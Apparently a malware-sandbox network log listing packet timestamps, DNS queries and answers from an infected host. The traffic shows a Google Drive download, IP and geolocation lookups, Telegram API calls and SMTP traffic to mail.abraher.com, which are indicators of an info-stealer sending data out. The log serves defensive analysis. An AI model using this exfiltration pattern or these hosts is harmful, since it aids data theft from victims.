                                                                                                                                                            Jan 11, 2025 00:07:35.282444954 CET49982443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:35.282464981 CET44349982104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:35.434015989 CET44349982104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:35.434091091 CET44349982104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:35.434369087 CET49982443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:35.434689045 CET49982443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:35.438250065 CET4998080192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:35.439506054 CET4998380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:35.443351030 CET8049980132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:35.443407059 CET4998080192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:35.447865009 CET8049983132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:35.447940111 CET4998380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:35.448026896 CET4998380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:35.454443932 CET8049983132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.149410009 CET8049983132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.162663937 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.162723064 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.162921906 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.163836956 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.163858891 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.194674969 CET4998380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:36.657865047 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.659560919 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.659594059 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.802642107 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.802710056 CET44349984104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.802772999 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.803184032 CET49984443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:36.807902098 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:36.812726021 CET8049985132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:36.812819004 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:36.812865019 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:36.817641973 CET8049985132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:37.586335897 CET8049985132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:37.587668896 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:37.587750912 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:37.588002920 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:37.588253975 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:37.588279963 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:37.632194996 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.043566942 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.045717001 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.045732021 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.180402994 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.180669069 CET44349986104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.180792093 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.181046009 CET49986443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.184293985 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.185465097 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.189338923 CET8049985132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.190237045 CET8049987132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.190417051 CET4998580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.190448999 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.190526962 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:38.195287943 CET8049987132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.880357027 CET8049987132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.889452934 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.889491081 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.889581919 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.889822006 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:38.889836073 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:38.929095030 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.369357109 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.371891975 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:39.371942043 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.500969887 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.501053095 CET44349988104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.501104116 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:39.501419067 CET49988443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:39.505182028 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.505997896 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.510171890 CET8049987132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.510222912 CET4998780192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.510802984 CET8049989132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:39.510886908 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.510941982 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:39.515652895 CET8049989132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.288095951 CET8049989132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.289623022 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.289681911 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.289772987 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.290021896 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.290034056 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.335334063 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.749365091 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.754092932 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.754137993 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.892146111 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.892239094 CET44349990104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.892354965 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.892878056 CET49990443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:40.896405935 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.897591114 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.902457952 CET8049989132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.902584076 CET8049991132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:40.902668953 CET4998980192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.902698994 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.902813911 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:40.908471107 CET8049991132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:41.576138973 CET8049991132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:41.632184982 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:41.673233032 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:41.673336983 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:41.673479080 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:41.673826933 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:41.673914909 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.128177881 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.130343914 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.130387068 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.260466099 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.260546923 CET44349992104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.260593891 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.261329889 CET49992443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.278774023 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:42.279930115 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:42.283812046 CET8049991132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.283855915 CET4999180192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:42.284778118 CET8049993132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.284832001 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:42.284938097 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:42.289683104 CET8049993132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.972179890 CET8049993132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.973500967 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.973604918 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:42.973776102 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.973926067 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:42.973948002 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.022949934 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.457911015 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.459903002 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:43.459955931 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.610825062 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.610963106 CET44349994104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.611085892 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:43.611591101 CET49994443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:43.614579916 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.615081072 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.619601965 CET8049993132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.619694948 CET4999380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.619950056 CET8049995132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:43.620035887 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.620126009 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:43.624914885 CET8049995132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.300144911 CET8049995132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.302175999 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:44.302227974 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.302464008 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:44.302651882 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:44.302670002 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.350944996 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:44.781266928 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.788630962 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:44.788660049 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.901216030 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.901384115 CET44349996104.21.16.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:44.901454926 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:44.901870012 CET49996443192.168.2.10104.21.16.1
                                                                                                                                                            Jan 11, 2025 00:07:45.024053097 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:45.029225111 CET8049995132.226.247.73192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.029297113 CET4999580192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:45.031558990 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.031589031 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.031651974 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.032367945 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.032382965 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.674736023 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.674905062 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.676945925 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.676976919 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.677251101 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.678643942 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.719327927 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.916249037 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.916333914 CET44349997149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.916392088 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:45.918802023 CET49997443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:07:51.594870090 CET4998380192.168.2.10132.226.247.73
                                                                                                                                                            Jan 11, 2025 00:07:52.434592009 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:07:52.439446926 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:52.439599037 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:00.259912968 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:00.260166883 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:00.264970064 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:00.477761030 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:00.478063107 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:00.482851982 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:00.682663918 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:00.682952881 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:00.687743902 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.455560923 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.455827951 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:02.460691929 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.655241966 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.655596972 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:02.657309055 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.657360077 CET49998587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:02.658595085 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:02.658649921 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.658710957 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:02.658992052 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:02.659004927 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:02.660433054 CET5874999882.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.349705935 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.369546890 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:03.369575024 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.369744062 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:03.369750977 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.698956966 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.699039936 CET44349999149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:03.699081898 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:03.699409962 CET49999443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:05.223047972 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:05.227937937 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:05.228044033 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:05.828849077 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:05.829058886 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:05.833978891 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:06.030777931 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:06.031033039 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:06.036098003 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:10.251218081 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:10.251497030 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:10.256386995 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.460294008 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.461553097 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:12.466413975 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.660594940 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.660821915 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:12.662488937 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.662532091 CET50000587192.168.2.1082.194.91.193
                                                                                                                                                            Jan 11, 2025 00:08:12.663331985 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:12.663377047 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.663497925 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:12.663805008 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:12.663813114 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:12.665586948 CET5875000082.194.91.193192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.279661894 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.281357050 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:13.281377077 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.281482935 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:13.281487942 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.518482924 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.518686056 CET44350001149.154.167.220192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:08:13.518825054 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            Jan 11, 2025 00:08:13.519186020 CET50001443192.168.2.10149.154.167.220
                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 11, 2025 00:07:27.497538090 CET5136253192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:27.504249096 CET53513621.1.1.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:28.745157003 CET5460353192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:28.752378941 CET53546031.1.1.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:32.546581984 CET5561753192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET53556171.1.1.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:33.858896017 CET5180953192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET53518091.1.1.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:45.023907900 CET6358253192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:45.030822039 CET53635821.1.1.1192.168.2.10
                                                                                                                                                            Jan 11, 2025 00:07:51.822766066 CET5021353192.168.2.101.1.1.1
                                                                                                                                                            Jan 11, 2025 00:07:52.433075905 CET53502131.1.1.1192.168.2.10
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Jan 11, 2025 00:07:27.497538090 CET192.168.2.101.1.1.10xf216Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:28.745157003 CET192.168.2.101.1.1.10x14b1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.546581984 CET192.168.2.101.1.1.10x41cfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.858896017 CET192.168.2.101.1.1.10x8fa3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:45.023907900 CET192.168.2.101.1.1.10x36bbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:51.822766066 CET192.168.2.101.1.1.10x7948Standard query (0)mail.abraher.comA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Jan 11, 2025 00:06:26.020108938 CET1.1.1.1192.168.2.100xb0b8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:06:26.020108938 CET1.1.1.1192.168.2.100xb0b8No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:27.504249096 CET1.1.1.1192.168.2.100xf216No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:28.752378941 CET1.1.1.1192.168.2.100x14b1No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:32.554038048 CET1.1.1.1192.168.2.100x41cfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 11, 2025 00:07:33.867261887 CET1.1.1.1192.168.2.100x8fa3No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
